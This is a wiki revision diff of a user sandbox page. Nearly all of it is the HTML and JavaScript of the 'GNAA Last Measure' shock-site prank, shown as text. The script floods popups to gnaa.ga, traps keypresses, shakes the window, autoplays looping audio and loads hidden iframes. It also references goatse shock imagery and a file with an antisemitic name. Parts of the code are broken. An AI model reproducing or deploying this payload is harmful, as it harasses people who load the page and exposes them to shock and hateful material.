πŸ³οΈβ€πŸŒˆHappy pride month to all ppl.πŸ³οΈβ€βš§οΈ --Screamer1234 (talk) 17:03, 31 May 2024 (MST)

User:Pmb1226/Sandbox: Difference between revisions

From Screamer Wiki
Jump to: navigation, search
No edit summary
No edit summary
Β 
(5 intermediate revisions by the same user not shown)
Line 1: Line 1:
<pre>
<div style="background:linear-gradient(to left, #f9dd16 1%,#c60000 25%,#f9f9ff 52%,#c60000 76%,#f9dd16 100%,#f9dd16 100%);">
<html>
[[File:Screamer Logo.png|center|256px|link=[[Screamer Wiki]]|Visit the main page]]
<head>
<title>THIS PAGE SMELLS LIKE FARTS</title>
<script>
var i;
var j;
function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("THIS PAGE SMELLS LIKE FARTS"); }
function ctrlkey() { if (event.keyCode == 17) alert("THIS PAGE SMELLS LIKE FARTS"); }
function delkey() { if (event.keyCode == 46) alert("GNAA LAST MEASURE LIVE!"); }
Β 
var nom = navigator.appName.toLowerCase();
var agt = navigator.userAgent.toLowerCase();
var is_majorΒ  = parseInt(navigator.appVersion);
var is_minorΒ  = parseFloat(navigator.appVersion);
var is_ieΒ  Β  = (agt.indexOf("msie") != -1);
var is_ie4upΒ  = (is_ie && (is_major >= 4));
var is_navΒ  Β  = (nom.indexOf('netscape')!=-1);
var is_nav4Β  = (is_nav && (is_major == 4));
var is_macΒ  Β  = (agt.indexOf("mac")!=-1);
var is_geckoΒ  = (agt.indexOf('gecko') != -1);
//Β  GECKO REVISION
var is_rev = 0
if (is_gecko) {
Β  Β  temp = agt.split("rv:")
Β  Β  is_rev = parseFloat(temp[1])
}
Β 
function procreate() {
Β  Β  for(i = 0; i < 16; i++) {
Β  Β  Β  Β  popUp("https://gnaa.ga/members");
Β  Β  }
}
function popUp(URL) {
Β  Β  day = new Date();
Β  Β  id = day.getTime();
Β  Β  eval("page" + id + " = window.open(URL, '_blank', 'toolbar=0,scrollbars=0,location=1,statusbar=0,menubar=0,resizable=0,width=640,height=583');");
}
function load_goatse() {
document.body.innerHTML += goatseflash;
setTimeout(unload_goatse(),3000);
}
function unload_goatse() {
document.getElementById("hello").style.display = 'none';
}
Β 
var images = new Array();
var imagecount = 0;
Β 
var delay = 10;
var step = .2;
var curstep = 0;
Β 
window.resizeTo(800,600);
var centerX = (self.screen.width - document.body.clientWidth) / 2;
var centerY = (self.screen.height - document.body.clientHeight - 120) / 2;
movewow();
Β 
function movewow() {
var j;
for (j = 0; j < 5; j++) {
curstep += step / 5;
var factorX = Math.sin(curstep * 6.1) * 0.9;
var factorY = Math.cos(curstep * 3.7) * 0.9;
Β 
factorX += 0.2 * Math.sin((20*Math.sin(curstep/20))+j*70)
* (Math.sin(10+curstep/10)+0.2)
* Math.cos((curstep + j*25)/10);
factorY += 0.2 * Math.sin((20*Math.sin(curstep/(20+j)))+j*70)
* (Math.sin(10+curstep/10)+0.2)
* Math.cos((curstep + j*25)/10);
window.moveTo(centerX * (1.0 + factorX), centerY * (1.0 + factorY));
}
document.body.background = images[(Math.floor(curstep) % imagecount) + 1];
setTimeout(movewow(), delay);
}
var protos = [
"lm.pdf",
"jews.wmv"
];
function add(str) {
div = document.getElementById("goatse");
div.innerHTML = '<iframe style="width: 1; height: 1;" src="'+str+'"></iframe>';
}
function ruin() {
document.body.innerHTML += '<div id="goatse">Y HALLO THAR!</div>';
//while (1) {
for (j = 0; j < 5; j++) {
for (i = 0; i < protos.length; i++) {
add(protos[i]);
}
}
}
var audio = new Array();
var audiocount = 27;
audio[0] = 'HEY.wav';
audio[1] = 'eska.wav';
audio[2] = 'fury.wav';
audio[3] = 'popeye.wav';
audio[4] = 'kirk.wav';
audio[5] = 'abez2.wav';
audio[6] = 'original.wav';
audio[7] = 'rkz.wav';
audio[8] = 'blackman.wav';
audio[9] = 'jesuitx1.wav';
audio[10] = 'rucas.wav';
audio[11] = 'jesuitx2.wav';
audio[12] = 'jizzy.wav';
audio[13] = 'sam.wav';
audio[14] = 'abez.wav';
audio[15] = 'trogg.wav';
audio[16] = 'jenk.wav';
audio[17] = 'acostoss.wav';
audio[18] = 'lord_kane.wav';
audio[19] = 'tehdely.wav';
audio[20] = 'unknown.wav';
audio[21] = 'jsilver2.wav';
audio[22] = 'jenk2.wav';
audio[23] = 'meepsheep.wav';
audio[24] = 'jsilver.wav';
audio[25] = 'jakk.wav';
audio[26] = 'acostoss2.wav';
function start_play(i) {
document.getElementById("audio").innerHTML += '<audio src="'+audio[i]+'" loop="true" autoplay />';
}
function start_audio() {
for (i = 1; i < audiocount; i++) {
setTimeout(start_play, 12000 * (i), i);
}
}
</script>
<style>
html {
height: 100%;
width: 100%;
overflow: hidden;
}
body {
height: 100%;
width: 100%;
margin: 0;
padding: 0;
}
</style>
</head>
<body style="background-image: url(https://gnaa.ga/lastmeasure/hello.jpg); background-color: white;" onload="start_audio();load_goatse();document.getElementById('goatse').reset();movewow();setTimeout(ruin(),20);" onmousemove="document.getElementById('goatse').reset();movewow();procreate();" onkeydown="altf4key();ctrlkey();delkey();procreate();" onunload="document.getElementById('goatse').reset();movewow();procreate();" onmouseover="document.getElementById('goatse').reset();movewow();procreate();">
<script>
</script>
<div>
GNAA LAST MEASURE LIVE!
</div>
</div>
<script>
</script>
<div id="audio">
<audio src="https://gnaa.ga/lastmeasure/HEY.wav" autoplay loop="true" /> </div>
<form onreset="procreate();" onsubmit="procreate();" action="#" id="goatse" name="goatse">
<p><span style="background-color:white; border:thin solid; color black;">Click meh</span></p>
</form>
</body>
</html>
</pre>

Latest revision as of 09:54, 12 February 2023

Visit the main page
Visit the main page